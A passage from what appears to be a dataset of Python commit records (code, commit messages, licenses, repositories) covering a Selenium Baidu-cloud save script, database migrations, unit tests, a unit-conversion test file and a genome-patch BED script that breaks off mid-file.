def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
|
8f3052a743a6be0c6191b47a3f9c3ee366c8fa58
|
YouKnowShit/Save2BCloud.py
|
YouKnowShit/Save2BCloud.py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
Save file to BD yun.
|
Save file to BD yun.
|
Python
|
mit
|
jiangtianyu2009/PiSoftCake
|
Save file to BD yun.
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
<commit_before><commit_msg>Save file to BD yun.<commit_after>
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
Save file to BD yun.from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
<commit_before><commit_msg>Save file to BD yun.<commit_after>from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
|
ace8c1dfbb05c3ffcc577ac966822e1c2752d9ea
|
migrations/versions/bd22b917f9f7_update_histogram_menu_order.py
|
migrations/versions/bd22b917f9f7_update_histogram_menu_order.py
|
"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
Fix the menu order of histogram tabs
|
Fix the menu order of histogram tabs
|
Python
|
apache-2.0
|
eubr-bigsea/tahiti,eubr-bigsea/tahiti,eubr-bigsea/tahiti,eubr-bigsea/tahiti
|
Fix the menu order of histogram tabs
|
"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
<commit_before><commit_msg>Fix the menu order of histogram tabs<commit_after>
|
"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
Fix the menu order of histogram tabs"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
<commit_before><commit_msg>Fix the menu order of histogram tabs<commit_after>"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
|
7b09f0309460eb306ef74a0bedfcad82ae3d91a0
|
regparser/web/jobs/migrations/0012_auto_20161012_2059.py
|
regparser/web/jobs/migrations/0012_auto_20161012_2059.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
Remove default keyword from hexhash key for RegulationFile.
|
Remove default keyword from hexhash key for RegulationFile.
|
Python
|
cc0-1.0
|
eregs/regulations-parser,tadhg-ohiggins/regulations-parser,tadhg-ohiggins/regulations-parser,eregs/regulations-parser
|
Remove default keyword from hexhash key for RegulationFile.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
<commit_before><commit_msg>Remove default keyword from hexhash key for RegulationFile.<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
Remove default keyword from hexhash key for RegulationFile.# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
<commit_before><commit_msg>Remove default keyword from hexhash key for RegulationFile.<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
|
f9b92cb7df1b5965fc14cefc423a8bbc664076b9
|
avena/tests/test-interp.py
|
avena/tests/test-interp.py
|
#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
Add a unit test for the interp module.
|
Add a unit test for the interp module.
|
Python
|
isc
|
eliteraspberries/avena
|
Add a unit test for the interp module.
|
#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
<commit_before><commit_msg>Add a unit test for the interp module.<commit_after>
|
#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
Add a unit test for the interp module.#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
<commit_before><commit_msg>Add a unit test for the interp module.<commit_after>#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
|
0d649b26e092f2678f2a39f9245568c9cf14b799
|
tempest/tests/services/compute/test_extensions_client.py
|
tempest/tests/services/compute/test_extensions_client.py
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
Add unit tests for extensions_client
|
Add unit tests for extensions_client
This patch adds unit test for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61
|
Python
|
apache-2.0
|
flyingfish007/tempest,JioCloud/tempest,rakeshmi/tempest,manasi24/tempest,pczerkas/tempest,xbezdick/tempest,akash1808/tempest,roopali8/tempest,roopali8/tempest,Tesora/tesora-tempest,nunogt/tempest,JioCloud/tempest,cisco-openstack/tempest,xbezdick/tempest,manasi24/jiocloud-tempest-qatempest,dkalashnik/tempest,openstack/tempest,Juniper/tempest,Tesora/tesora-tempest,izadorozhna/tempest,bigswitch/tempest,manasi24/tempest,hayderimran7/tempest,zsoltdudas/lis-tempest,akash1808/tempest,flyingfish007/tempest,pandeyop/tempest,tudorvio/tempest,vedujoshi/tempest,varunarya10/tempest,varunarya10/tempest,dkalashnik/tempest,sebrandon1/tempest,LIS/lis-tempest,zsoltdudas/lis-tempest,nunogt/tempest,tudorvio/tempest,manasi24/jiocloud-tempest-qatempest,hayderimran7/tempest,pczerkas/tempest,LIS/lis-tempest,bigswitch/tempest,Juniper/tempest,vedujoshi/tempest,openstack/tempest,masayukig/tempest,pandeyop/tempest,cisco-openstack/tempest,tonyli71/tempest,masayukig/tempest,tonyli71/tempest,izadorozhna/tempest,sebrandon1/tempest,rakeshmi/tempest
|
Add unit tests for extensions_client
This patch adds unit test for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
<commit_before><commit_msg>Add unit tests for extensions_client
This patch adds unit test for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61<commit_after>
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
Add unit tests for extensions_client
This patch adds unit test for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
<commit_before><commit_msg>Add unit tests for extensions_client
This patch adds unit test for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61<commit_after># Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
|
cedf6f46768ee607b274bcb7fe10bb5042d5ef26
|
run_tests.py
|
run_tests.py
|
import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# To run the function this is needed here.
if __name__ == '__main__':
uniittest.main()
|
Test functions to convert units.
|
Test functions to convert units.
|
Python
|
mit
|
RoyGBivDash/Unit_Conversions
|
Test functions to convert units.
|
import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# To run the function this is needed here.
if __name__ == '__main__':
uniittest.main()
|
<commit_before><commit_msg>Test functions to convert units.<commit_after>
|
import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# To run the function this is needed here.
if __name__ == '__main__':
uniittest.main()
|
Test functions to convert units.import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# To run the function this is needed here.
if __name__ == '__main__':
uniittest.main()
|
<commit_before><commit_msg>Test functions to convert units.<commit_after>import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# To run the function this is needed here.
if __name__ == '__main__':
uniittest.main()
|
|
07f70ec2011f676cdb30eb9e41fedbc2657cbea1
|
insertfiles.py
|
insertfiles.py
|
#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
Add functionality to insert files into the config file
|
Add functionality to insert files into the config file
|
Python
|
mit
|
BradleyCai/breadbot
|
Add functionality to insert files into the config file
|
#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
<commit_before><commit_msg>Add functionality to insert files into the config file<commit_after>
|
#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
Add functionality to insert files into the config file#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
<commit_before><commit_msg>Add functionality to insert files into the config file<commit_after>#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
|
c03db0a196d04b26ac671b16cb57a0f9fdfea82e
|
gemini/annotation_provenance/make-ncbi-grc-patches.py
|
gemini/annotation_provenance/make-ncbi-grc-patches.py
|
#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
